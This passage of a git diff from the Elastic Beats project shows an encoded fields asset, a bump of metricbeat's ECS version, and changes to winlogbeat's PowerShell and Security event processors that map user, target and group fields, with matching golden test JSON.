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" } diff --git a/x-pack/metricbeat/cmd/root.go b/x-pack/metricbeat/cmd/root.go index de67f5f37993..c1822a428b8c 100644 --- a/x-pack/metricbeat/cmd/root.go +++ b/x-pack/metricbeat/cmd/root.go @@ -31,7 +31,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd to handle beats cli diff --git a/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js b/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js index 4ef1155086bc..698b12711bf2 100644 --- a/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js +++ b/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js @@ -333,11 +333,9 @@ var powershell = (function () { var userParts = evt.Get("winlog.event_data.UserId").split("\\"); evt.Delete("winlog.event_data.UserId"); if (userParts.length === 2) { - evt.Delete("user"); evt.Put("user.domain", userParts[0]); evt.Put("user.name", userParts[1]); evt.AppendTo("related.user", userParts[1]); - evt.Delete("winlog.event_data.UserId"); } }; @@ -346,7 +344,18 @@ var powershell = (function () { evt.Delete("winlog.event_data.Connected User"); if (userParts.length === 2) { evt.Put("powershell.connected_user.domain", userParts[0]); + if (evt.Get("user.domain")) { + evt.Put("destination.user.domain", evt.Get("user.domain")); + } + evt.Put("source.user.domain", userParts[0]); + evt.Put("user.domain", userParts[0]); + evt.Put("powershell.connected_user.name", userParts[1]); + if (evt.Get("user.name")) { + evt.Put("destination.user.name", evt.Get("user.name")); + } + evt.Put("source.user.name", userParts[1]); + evt.Put("user.name", userParts[1]); evt.AppendTo("related.user", userParts[1]); } }; @@ -541,6 +550,18 @@ var powershell = (function () { ignore_missing: true, fail_on_error: false, }) + .Convert({ + fields: [ + { + from: "winlog.user.identifier", + to: "user.id", + type: "string", + }, + ], + mode: "copy", + ignore_missing: true, + fail_on_error: false, + }) .Add(normalizeCommonFieldNames) .Add(addEngineVersion) .Add(addPipelineID) @@ -583,6 +604,18 @@ var powershell = (function () { ignore_missing: true, fail_on_error: false, }) + .Convert({ + fields: [ + { + from: "winlog.user.identifier", + to: "user.id", + type: "string", + }, + ], + mode: "copy", + ignore_missing: true, + fail_on_error: false, + }) .Add(normalizeCommonFieldNames) .Add(addFileInfo) .Add(addScriptBlockID) @@ -594,6 +627,18 @@ var powershell = (function () { .Add(addRunspaceID) .Add(addScriptBlockID) .Add(removeEmptyEventData) + .Convert({ + fields: [ + { + from: "winlog.user.identifier", + to: "user.id", + type: "string", + }, + ], + mode: "copy", + ignore_missing: true, + fail_on_error: false, + }) .Build(); var event4105 = new processor.Chain() diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json index e040dd0d8f45..c6c186bd12e2 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json @@ -1,6 +1,12 @@ [ { "@timestamp": "2020-05-15T08:11:47.8979495Z", + "destination": { + "user": { + "domain": "VAGRANT", + "name": "vagrant" + } + }, "event": { "action": "Executing Pipeline", "category": [ @@ -72,8 +78,15 @@ "related": { "user": "vagrant" }, + "source": { + "user": { + "domain": "VAGRANT", + "name": "vagrant" + } + }, "user": { "domain": "VAGRANT", + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000", "name": "vagrant" }, "winlog": { @@ -196,6 +209,7 @@ }, "user": { "domain": "VAGRANT", + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000", "name": "vagrant" }, "winlog": { diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json index 5926c0f789e3..3c2af0061853 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json @@ -28,6 +28,9 @@ "sequence": 1, "total": 1 }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{fb13c9de-29f7-0001-18e0-13fbf729d601}", "api": "wineventlog", @@ -85,6 +88,9 @@ "sequence": 1, "total": 1 }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{fb13c9de-29f7-0000-79db-13fbf729d601}", "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json index 2cbd24255ea5..f19c03b5abc7 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json @@ -26,6 +26,9 @@ }, "runspace_id": "9c031e5c-8d5a-4b91-a12e-b3624970b623" }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{dd68516a-2930-0000-5962-68dd3029d601}", "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json index e598bb408eeb..117c907387e6 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json @@ -26,6 +26,9 @@ }, "runspace_id": "3f1a9181-0523-4645-a42c-2c1868c39332" }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{e3200b8a-290e-0002-332a-20e30e29d601}", "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/config/winlogbeat-security.js b/x-pack/winlogbeat/module/security/config/winlogbeat-security.js index 44d0e8eb34db..e624a819bebc 100644 --- a/x-pack/winlogbeat/module/security/config/winlogbeat-security.js +++ b/x-pack/winlogbeat/module/security/config/winlogbeat-security.js @@ -179,7 +179,7 @@ var security = (function () { "4634": [["authentication"], ["end"], "logged-out"], "4647": [["authentication"], ["end"], "logged-out"], "4648": [["authentication"], ["start"], "logged-in-explicit"], - "4657": [["configuration"], ["change"], "registry-value-modified"], + "4657": [["registry", "configuration"], ["change"], "registry-value-modified"], "4670": [["iam", "configuration"],["admin", "change"],"permissions-changed"], "4672": [["iam"], ["admin"], "logged-in-special"], "4673": [["iam"], ["admin"], "privileged-service-called"], @@ -250,8 +250,8 @@ var security = (function () { "4770": [["authentication"], ["start"], "kerberos-service-ticket-renewed"], "4771": [["authentication"], ["start"], "kerberos-preauth-failed"], "4776": [["authentication"], ["start"], "credential-validated"], - "4778": [["authentication"], ["start"], "session-reconnected"], - "4779": [["authentication"], ["end"], "session-disconnected"], + "4778": [["authentication", "session"], ["start"], "session-reconnected"], + "4779": [["authentication", "session"], ["end"], "session-disconnected"], "4781": [["iam"], ["user", "change"], "renamed-user-account"], "4798": [["iam"], ["user", "info"], "group-membership-enumerated"], // process enumerates the local groups to which the specified user belongs "4799": [["iam"], ["group", "info"], "user-member-enumerated"], // a process enumerates the members of the specified local group @@ -1351,7 +1351,7 @@ var security = (function () { "16903": "Publish", }; - // Trust Types + // Trust Types // https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706 var trustTypes = { "1": "TRUST_TYPE_DOWNLEVEL", @@ -1360,7 +1360,7 @@ var security = (function () { "4": "TRUST_TYPE_DCE" } - // Trust Direction + // Trust Direction // https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706 var trustDirection = { "0": "TRUST_DIRECTION_DISABLED", @@ -1369,7 +1369,7 @@ var security = (function () { "3": "TRUST_DIRECTION_BIDIRECTIONAL" } - // Trust Attributes + // Trust Attributes // https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706 var trustAttributes = { "0": "UNDEFINED", @@ -1899,35 +1899,58 @@ var security = (function () { }) .Build(); - var copyTargetUser = new processor.Chain() - .Convert({ - fields: [ - {from: "winlog.event_data.TargetUserSid", to: "user.id"}, - {from: "winlog.event_data.TargetUserName", to: "user.name"}, - {from: "winlog.event_data.TargetDomainName", to: "user.domain"}, - ], - ignore_missing: true, - }) - .Add(function(evt) { - var user = evt.Get("winlog.event_data.TargetUserName"); - if (user) { - if (/.@*/.test(user)) { - user = user.split('@')[0]; - evt.Put('user.name', user); - } - evt.AppendTo('related.user', user); + + var copyTargetUser = function(evt) { + var targetUserId = evt.Get("winlog.event_data.TargetUserSid"); + if (targetUserId) { + if (evt.Get("user.id")) evt.Put("user.target.id", targetUserId); + else evt.Put("user.id", targetUserId); + } + + var targetUserName = evt.Get("winlog.event_data.TargetUserName"); + if (targetUserName) { + if (/.@*/.test(targetUserName)) { + targetUserName = targetUserName.split('@')[0]; } - }) - .Build(); + + evt.AppendTo("related.user", targetUserName); + if (evt.Get("user.name")) evt.Put("user.target.name", targetUserName); + else evt.Put("user.name", targetUserName); + } + + var targetUserDomain = evt.Get("winlog.event_data.TargetDomainName"); + if (targetUserDomain) { + if (evt.Get("user.domain")) evt.Put("user.target.domain", targetUserDomain); + else evt.Put("user.domain", targetUserDomain); + } + } + + var copyMemberToUser = function(evt) { + var member = evt.Get("winlog.event_data.MemberName"); + if (!member) { + return; + } + + var userName = member.split(',')[0].replace('CN=', '').replace('cn=', ''); + + evt.AppendTo("related.user", userName); + evt.Put("user.target.name", userName); + } var copyTargetUserToGroup = new processor.Chain() .Convert({ fields: [ {from: "winlog.event_data.TargetUserSid", to: "group.id"}, + {from: "winlog.event_data.TargetSid", to: "group.id"}, {from: "winlog.event_data.TargetUserName", to: "group.name"}, {from: "winlog.event_data.TargetDomainName", to: "group.domain"}, ], ignore_missing: true, + }).Add(function(evt) { + if (!evt.Get("user.target")) return; + evt.Put("user.target.group.id", evt.Get("group.id")); + evt.Put("user.target.group.name", evt.Get("group.name")); + evt.Put("user.target.group.domain", evt.Get("group.domain")); }) .Build(); @@ -2194,16 +2217,10 @@ var security = (function () { var groupMgmtEvts = new processor.Chain() .Add(copySubjectUser) .Add(copySubjectUserLogonId) + .Add(copyMemberToUser) .Add(copyTargetUserToGroup) .Add(renameCommonAuthFields) .Add(addEventFields) - .Add(function(evt) { - var member = evt.Get("winlog.event_data.MemberName"); - if (!member) { - return; - } - evt.AppendTo("related.user", member.split(',')[0].replace('CN=', '').replace('cn=', '')); - }) .Build(); var auditLogCleared = new processor.Chain() diff --git a/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json index 5500629ef454..1c7d689ef4b4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json index c34a17a17236..a19ba89ec839 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json index 0280c7157847..be20ce400a48 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", 